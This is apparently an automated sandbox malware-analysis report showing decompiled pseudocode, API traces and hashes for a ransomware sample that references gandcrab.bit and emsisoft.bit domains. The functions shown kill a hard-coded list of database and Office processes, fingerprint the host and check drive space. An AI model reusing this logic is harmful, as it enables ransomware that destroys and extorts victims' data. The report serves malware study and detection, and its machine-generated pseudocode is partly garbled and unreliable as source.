						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
						 *((short*)(_t104 - 0x20)) = 0x5c;
						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
						lstrcatW( *(_t102 + 0x7c), "_");
						_t72 = GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10); // executed
						if(_t72 == 0) {
							lstrcatW( *(_t102 + 0x7c), L"0,");
							goto L6;
						} else {
							 *((intOrPtr*)(_t104 - 8)) = E00A88470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t85 = _t93;
							_t75 = E00A88470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t100 =  *((intOrPtr*)(_t104 - 8));
							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t104 - 8)) = _t85;
							_t77 = lstrlenW( *(_t102 + 0x7c));
							_push(_t85);
							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
							_t80 = lstrlenW( *(_t102 + 0x7c));
							_push( *((intOrPtr*)(_t104 - 8)));
							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
							_t106 = _t106 + 0x20;
							lstrcatW( *(_t102 + 0x7c), ",");
						}
					}
					_t51 =  *(_t104 - 0x18) + 1;
					 *(_t104 - 0x18) = _t51;
				} while (_t51 < 0x1b);
				_t56 = lstrlenW( *(_t102 + 0x7c));
				_t88 =  *(_t102 + 0x7c);
				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
				if( *(_t102 + 0x80) != 0) {
					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
					 *(_t102 + 0x84) = _t58;
					if(_t58 == 0) {
						L13:
						 *(_t102 + 0x80) = 0;
					} else {
						_push(_t88);
						_t59 = E00A868F0(_t58); // executed
						if(_t59 == 0) {
							VirtualFree( *(_t102 + 0x84), _t59, 0x8000); // executed
							goto L13;
						}
					}
				}
				return 1;
			}

0x00a87369
0x00a87369
0x00a87369
0x00a87370
0x00a87375
0x00a8737d
0x00a87383
0x00a87388
0x00a8747b
0x00a87397
0x00a87399
0x00a873a4
0x00a873b2
0x00a873b6
0x00a873c0
0x00a873d6
0x00a873de
0x00a87479
0x00000000
0x00a873e4
0x00a87400
0x00a87403
0x00a87405
0x00a8740a
0x00a87416
0x00a87419
0x00a8741b
0x00a8741e
0x00a87427
0x00a87438
0x00a87446
0x00a87448
0x00a8745a
0x00a87462
0x00a8746d
0x00a8746d
0x00a873de
0x00a87484
0x00a87485
0x00a87488
0x00a87494
0x00a87496
0x00a8749b
0x00a874a7
0x00a874b7
0x00a874bd
0x00a874c5
0x00a874e4
0x00a874e4
0x00a874c7
0x00a874c7
0x00a874c9
0x00a874d0
0x00a874de
0x00000000
0x00a874de
0x00a874d0
0x00a874c5
0x00a874f9

APIs

GetDriveTypeW.KERNEL32(?), ref: 00A8737D
lstrcatW.KERNEL32(?,?), ref: 00A873A4
lstrcatW.KERNEL32(?,00A9073C), ref: 00A873B6
lstrcatW.KERNEL32(?,00A907B0), ref: 00A873C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00A84590), ref: 00A873D6
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00A84590,00000000,?,00000000), ref: 00A8741E
wsprintfW.USER32 ref: 00A87438
lstrlenW.KERNEL32(?), ref: 00A87446
wsprintfW.USER32 ref: 00A8745A
lstrcatW.KERNEL32(?,00A907D0), ref: 00A8746D
lstrcatW.KERNEL32(?,00A907D4), ref: 00A87479
lstrlenW.KERNEL32(?), ref: 00A87494
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 00A874B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 00A874DE

Strings

%I64u/, xrefs: 00A87432
%I64u, xrefs: 00A87451

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
String ID: %I64u$%I64u/
API String ID: 1496313530-2450085969
Opcode ID: f8fc452f20c8d2dd9774c714d8d7394aa3aa9ddb485f1b2ca2c0bdf0b4829361
Instruction ID: e380cfaaa134c1bccba9bf6df7d1da69cf52b2cc4e18545d20fbeac28f6d85f0
Opcode Fuzzy Hash: f8fc452f20c8d2dd9774c714d8d7394aa3aa9ddb485f1b2ca2c0bdf0b4829361
Instruction Fuzzy Hash: 7F413071A00609AFDB21EBA4CD85FAEBBF9FF48700F244519E656E31A0DA31E911CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A84EB0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A84EB0() {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v72;
				WCHAR* _t26;
				void* _t31;
				long _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t41;
				void* _t46;
				signed int _t50;
				void* _t52;

				asm("movdqa xmm0, [0xa90960]");
				_v20 =  &_v72;
				_v16 =  &_v36;
				_v36 = 0x69736d65;
				_v32 = 0x74666f73;
				_v28 = 0x7469622e;
				_v24 = 0;
				asm("movdqu [ebp-0x44], xmm0");
				_v56 = 0;
				_v52 = 0x646e6167;
				_v48 = 0x62617263;
				_v44 = 0x7469622e;
				_v40 = 0;
				_v12 =  &_v52;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4); // executed
				_t38 = _t26;
				if(_t38 != 0) {
					_t40 = 0;
					_t50 = 0;
					while(1) {
						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
						_t50 =  ==  ? 0 : _t50 + 1;
						if(_t40 == 0xffffffff) {
							Sleep(0x2710); // executed
						}
						_t31 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4); // executed
						_t46 = _t31;
						_t41 = _t46; // executed
						E00A84D60(_t41, _v8); // executed
						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
						if(_t33 != 0) {
							break;
						}
						VirtualFree(_t46, _t33, 0x8000); // executed
						_t40 = _t41 | 0xffffffff;
					}
					wsprintfW(_t38, L"%S", _t46);
					VirtualFree(_t46, 0, 0x8000);
					_t26 = _t38;
				}
				return _t26;
			}

0x00a84eb6
0x00a84ecc
0x00a84ed7
0x00a84ee4
0x00a84eeb
0x00a84ef2
0x00a84ef9
0x00a84efd
0x00a84f02
0x00a84f06
0x00a84f0d
0x00a84f14
0x00a84f1b
0x00a84f1f
0x00a84f22
0x00a84f24
0x00a84f28
0x00a84f2e
0x00a84f30
0x00a84f32
0x00a84f37
0x00a84f3f
0x00a84f45
0x00a84f4c
0x00a84f4c
0x00a84f6a
0x00a84f6f
0x00a84f71
0x00a84f73
0x00a84f7e
0x00a84f86
0x00000000
0x00000000
0x00a84f8f
0x00a84f9b
0x00a84f9b
0x00a84fa7
0x00a84fb8
0x00a84fbe
0x00a84fbe
0x00a84fc6

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74656980,00000000,00000000), ref: 00A84F22
Sleep.KERNEL32(00002710), ref: 00A84F4C
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00A84F5A
VirtualAlloc.KERNEL32(00000000,00000000), ref: 00A84F6A
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00A84F7E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84F8F
wsprintfW.USER32 ref: 00A84FA7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A84FB8

Strings

soft, xrefs: 00A84EEB
gand, xrefs: 00A84F06
.bit, xrefs: 00A84F14
fabian wosar <3, xrefs: 00A84F78
.bit, xrefs: 00A84EF2
emsi, xrefs: 00A84EE4
crab, xrefs: 00A84F0D

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
API String ID: 2709691373-1090818981
Opcode ID: e5c8520b1f945018d97063a34e85ee7cab8e42c0eb0a4edd4d0df2b413a6ce88
Instruction ID: 042c6d624b592cc1154d149c2ec766db92e495c742e9b48d31bdae91057d2c5d
Opcode Fuzzy Hash: e5c8520b1f945018d97063a34e85ee7cab8e42c0eb0a4edd4d0df2b413a6ce88
Instruction Fuzzy Hash: A4317571A44319ABDB11DFE4AD8ABAEBBB8FB48714F140219F601B72C0D7B45902CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00A84640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00A84640() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x00a84646
0x00a84653
0x00a8465b
0x00a84663
0x00a8466b
0x00a84673
0x00a8467b
0x00a84683
0x00a8468b
0x00a84693
0x00a8469b
0x00a846a3
0x00a846ab
0x00a846b3
0x00a846bb
0x00a846c3
0x00a846cb
0x00a846d3
0x00a846db
0x00a846e3
0x00a846eb
0x00a846f3
0x00a846fb
0x00a84703
0x00a8470b
0x00a84713
0x00a8471b
0x00a84723
0x00a8472e
0x00a84739
0x00a84744
0x00a8474f
0x00a8475a
0x00a84765
0x00a84770
0x00a8477b
0x00a84786
0x00a84791
0x00a8479c
0x00a847a7
0x00a847b2
0x00a847c4
0x00a847c8
0x00a847cc
0x00a847d2
0x00a847d6
0x00a847d8
0x00a847e1
0x00a847e3
0x00a847e5
0x00a847e5
0x00a847e1
0x00a847f1
0x00a847f1
0x00a847f4
0x00a847f4
0x00a84800
0x00a84805
0x00a8480d
0x00a8481b
0x00a8481f
0x00a84824
0x00a84831
0x00a84831
0x00a8481f
0x00a8483b
0x00a8483c
0x00a8483c
0x00a8483f
0x00a84844
0x00a8484a
0x00a84850
0x00a84850
0x00a84853
0x00a84859
0x00a84863
0x00a84863
0x00a8486a
0x00a84872

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A847B2
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 00A847CC
Process32FirstW.KERNEL32(00000000,00000000), ref: 00A847E5
lstrcmpiW.KERNEL32(00000002,00000024), ref: 00A84805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A84815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A84824
CloseHandle.KERNEL32(00000000), ref: 00A84831
Process32NextW.KERNEL32(?,00000000), ref: 00A8484A
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84863
FindCloseChangeNotification.KERNEL32(?), ref: 00A8486A

Strings

iet, xrefs: 00A84805

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: iet
API String ID: 3023235786-2308090442
Opcode ID: bea8e6a5a4dae51855e95413715737b1930a59f0d7f26ef052451aae0aa08f9e
Instruction ID: 27664acd61ed58eb7698f647d43cdeeefe7f1d556d064120f82d1ca1038db059
Opcode Fuzzy Hash: bea8e6a5a4dae51855e95413715737b1930a59f0d7f26ef052451aae0aa08f9e
Instruction Fuzzy Hash: E35127B4508381DFE720EF50988C75FBBE4BB96718F544A1CE5986B250E7B18809CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00A84550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00A839B0: GetProcessHeap.KERNEL32(?,?,00A84587,00000000,?,00000000), ref: 00A83A4C

Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00A86DB7
Part of subcall function 00A86D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00A86DC8
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00A86DE6
Part of subcall function 00A86D90: GetComputerNameW.KERNEL32 ref: 00A86DF0
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E10
Part of subcall function 00A86D90: wsprintfW.USER32 ref: 00A86E51
Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E6E
Part of subcall function 00A86D90: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00A86E92
Part of subcall function 00A86D90: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00A86EB6
Part of subcall function 00A86D90: RegCloseKey.KERNEL32(00000000), ref: 00A86ED2

Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BF2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86BFD
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C13
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C1E
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(00A848B6,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C34
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C3F
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C55
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C60
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C76
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C81
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86C97
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CA2
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CC1
Part of subcall function 00A86BA0: lstrlenW.KERNEL32(?,?,?,?,00A84599,00000000,?,00000000,00000000,?,00000000), ref: 00A86CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845AC
lstrcpyW.KERNEL32 ref: 00A845CF
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845D6
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845EE
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A845FA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A84601
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8461B

Strings

Global\, xrefs: 00A845C9

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 2f35d6afba12f9d237ba54f62401fdc5dcd6f72dd85a4b39bdc1134c0010a0b1
Instruction ID: 7850526a41e4edaea71034bf893077408dba20180f860b9b0eca784a454fc2d8
Opcode Fuzzy Hash: 2f35d6afba12f9d237ba54f62401fdc5dcd6f72dd85a4b39bdc1134c0010a0b1
Instruction Fuzzy Hash: 9C21D1716943227BE224B764DC4BF7F7A68EB40B40F500628F606AA0D0EB906D05C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00A847F8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A847F8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x00a847f8
0x00a847f8
0x00a84800
0x00a84800
0x00a84805
0x00a8480d
0x00a8481b
0x00a8481f
0x00a84824
0x00a84831
0x00a84831
0x00a8481f
0x00a8483b
0x00a8483c
0x00a8483c
0x00a84842
0x00000000
0x00000000
0x00a84844
0x00a84844
0x00a8484a
0x00a84850
0x00a84850
0x00a84855
0x00a847f4
0x00a84800
0x00000000
0x00000000
0x00000000
0x00a84800
0x00a84859
0x00a84863
0x00a84863
0x00a8486a
0x00a84872
0x00a84800
0x00a84805
0x00a8480d
0x00a8481b
0x00a8481f
0x00a84824
0x00a84831
0x00a84831
0x00a8481f
0x00a8483b
0x00a8483c
0x00a8483c
0x00a8483f

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 00A84805
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A84815
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A84824
CloseHandle.KERNEL32(00000000), ref: 00A84831
Process32NextW.KERNEL32(?,00000000), ref: 00A8484A
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84863
FindCloseChangeNotification.KERNEL32(?), ref: 00A8486A

Strings

iet, xrefs: 00A84805

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: iet
API String ID: 3573210778-2308090442
Opcode ID: 6978f017470fb62dfbf8a2154f11d1e0caf426358af10e148e80335e6ca4b3b5
Instruction ID: 5d113f3bfe0158aad51e0f613d5220344b68bc4c6a5879491ae70c02c1257345
Opcode Fuzzy Hash: 6978f017470fb62dfbf8a2154f11d1e0caf426358af10e148e80335e6ca4b3b5
Instruction Fuzzy Hash: 9101A972640112AFDB10BF91EC8CB7B7779EF99701F150124FD0A96050EB719C06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A87720 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A87720(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x00a87721
0x00a8772d
0x00a87739
0x00a87739
0x00a8773f
0x00a8774b
0x00a8774b
0x00a87751
0x00a8775d
0x00a8775d
0x00a87763
0x00a8776f
0x00a8776f
0x00a87775
0x00a87781
0x00a87781
0x00a87787
0x00a87793
0x00a87793
0x00a87799
0x00a877a5
0x00a877a5
0x00a877ab
0x00a877b7
0x00a877b7
0x00a877bd
0x00a877c9
0x00a877c9
0x00a877d2
0x00000000
0x00a877e1
0x00a877e5

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A87739
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8774B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8775D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A8776F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A87781
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A87793
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A877A5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A877B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A877C9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00A8462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A877E1

Memory Dump Source

